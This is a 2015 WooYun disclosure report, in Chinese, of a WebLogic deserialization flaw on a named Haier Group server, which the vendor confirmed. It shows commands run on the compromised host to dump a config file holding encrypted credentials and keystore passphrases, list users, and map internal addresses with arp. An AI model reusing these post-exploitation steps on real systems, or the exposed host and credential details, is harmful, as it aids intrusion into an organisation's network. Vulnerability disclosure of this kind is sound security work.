当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163712

漏洞标题:海尔集团某系统存在weblogic的反序列化漏洞(可入内网)

相关厂商:海尔集团

漏洞作者: 路人甲

提交时间:2015-12-22 23:13

修复时间:2016-02-06 10:45

公开时间:2016-02-06 10:45

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-24: 厂商已经确认,细节仅向厂商公开
2016-01-03: 细节向核心白帽子及相关领域专家公开
2016-01-13: 细节向普通白帽子公开
2016-01-23: 细节向实习白帽子公开
2016-02-06: 细节向公众公开

简要描述:

海尔集团

详细说明:

http://27.223.70.77:7001/
存在weblogic的反序列化漏洞
可反弹shell

1.jpg


读取下配置信息
D:\Oracle\Middleware\user_projects\domains\base_domain\config>type config.xml

type config.xml
<?xml version='1.0' encoding='UTF-8'?>
<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">
<name>base_domain</name>
<domain-version>10.3.5.0</domain-version>
<security-configuration>
<name>base_domain</name>
<realm>
<sec:authentication-provider xsi:type="wls:default-authenticatorType"></sec:authentication-provider>
<sec:authentication-provider xsi:type="wls:default-identity-asserterType">
<sec:active-type>AuthenticatedUser</sec:active-type>
</sec:authentication-provider>
<sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"></sec:role-mapper>
<sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"></sec:authorizer>
<sec:adjudicator xsi:type="wls:default-adjudicatorType"></sec:adjudicator>
<sec:credential-mapper xsi:type="wls:default-credential-mapperType"></sec:credential-mapper>
<sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"></sec:cert-path-provider>
<sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder>
<sec:name>myrealm</sec:name>
<sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType">
<sec:name>SystemPasswordValidator</sec:name>
<pas:min-password-length>8</pas:min-password-length>
<pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters>
</sec:password-validator>
</realm>
<default-realm>myrealm</default-realm>
<credential-encrypted>{AES}k77cNkchopQnD98Lk9bhatCSc8LYsOIPwQpBwD2IZ4GGFFkV2NWnNMNAG69CBoBpLK7gQa+WCOek6AfWNz6etTFe8A42os5QZQhevUwJVTqYBPcbP9JGDSjzq9+YOLOd</credential-encrypted>
<node-manager-username>kXRx0qV8Ci</node-manager-username>
<node-manager-password-encrypted>{AES}rBvG0C6Lqyj+i1tVEsjg1uRLlZA0FxVOBNPPT0mzHbI=</node-manager-password-encrypted>
</security-configuration>
<server>
<name>AdminServer</name>
<ssl>
<server-private-key-alias>weblogic</server-private-key-alias>
<server-private-key-pass-phrase-encrypted>{AES}gI07Nk70oXtmsbc9eRoE1GEiFoeioTtTZzTdfamsiy0=</server-private-key-pass-phrase-encrypted>
</ssl>
<listen-address></listen-address>
<key-stores>DemoIdentityAndDemoTrust</key-stores>
<custom-identity-key-store-file-name>D:\Oracle\MIDDLE~1\WLSERV~1.3\server\lib\DemoIdentity.jks</custom-identity-key-store-file-name>
<custom-identity-key-store-type>jks</custom-identity-key-store-type>
<custom-identity-key-store-pass-phrase-encrypted>{AES}WJ4ttnQJEBtkpWAkO+MUDJmreWP0GIxLLoP1htB22kI=</custom-identity-key-store-pass-phrase-encrypted>
<custom-trust-key-store-file-name>D:\Oracle\Middleware\user_projects\domains\base_domain\jpushJks1.jks</custom-trust-key-store-file-name>
<custom-trust-key-store-type>jks</custom-trust-key-store-type>
<custom-trust-key-store-pass-phrase-encrypted>{AES}wd3BUY+mB9X7NC4wCcfmI6mFnkRgtbCq0vCYTL3heLA=</custom-trust-key-store-pass-phrase-encrypted>
</server>
<production-mode-enabled>true</production-mode-enabled>
<embedded-ldap>
<name>base_domain</name>
<credential-encrypted>{AES}pbAo/PlhkYvUI6OQFrA89rodZK09WpCs+EeP04TAVbg0xr0eDQ8xqy0+RfmIwu/5</credential-encrypted>
</embedded-ldap>
<configuration-version>10.3.5.0</configuration-version>
<app-deployment>
<name>sales</name>
<target>AdminServer</target>
<module-type>war</module-type>
<source-path>servers\AdminServer\upload\sales.war</source-path>
<security-dd-model>DDOnly</security-dd-model>
</app-deployment>
<app-deployment>
<name>dkt</name>
<target>AdminServer</target>
<module-type>war</module-type>
<source-path>servers\AdminServer\upload\dkt.war</source-path>
<security-dd-model>DDOnly</security-dd-model>
</app-deployment>
<admin-server-name>AdminServer</admin-server-name>
</domain>


net user

2.jpg


arp -a

3.jpg


arp -a
½ӿغ 10.135.108.217 --- 0xb
Internet µٖ· ϯmµٖ· `э
10.135.108.1 00-26-52-b3-9a-45 ¶¯̬
10.135.108.10 d8-9d-67-26-54-44 ¶¯̬
10.135.108.11 d8-9d-67-2b-7b-34 ¶¯̬
10.135.108.90 00-50-56-a3-75-1f ¶¯̬
10.135.108.94 00-50-56-a3-09-e8 ¶¯̬
10.135.108.111 00-50-56-a3-35-3c ¶¯̬
10.135.108.146 00-50-56-a3-0e-8f ¶¯̬
10.135.108.181 00-50-56-a3-79-8e ¶¯̬
10.135.108.188 00-50-56-a3-47-94 ¶¯̬
10.135.108.197 00-50-56-a3-37-b3 ¶¯̬
10.135.108.221 00-50-56-a3-6e-ae ¶¯̬
10.135.108.232 00-50-56-a3-45-3f ¶¯̬
10.135.108.255 ff-ff-ff-ff-ff-ff ¾²̬
224.0.0.22 01-00-5e-00-00-16 ¾²̬
224.0.0.252 01-00-5e-00-00-fc ¾²̬
239.255.255.250 01-00-5e-7f-ff-fa ¾²̬


漏洞证明:

net user

2.jpg


arp -a

3.jpg

修复方案:

升级

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-24 09:07

厂商回复:

感谢白帽子的测试与提醒,已安排人员进行处理。

最新状态:

暂无


漏洞评价:

评价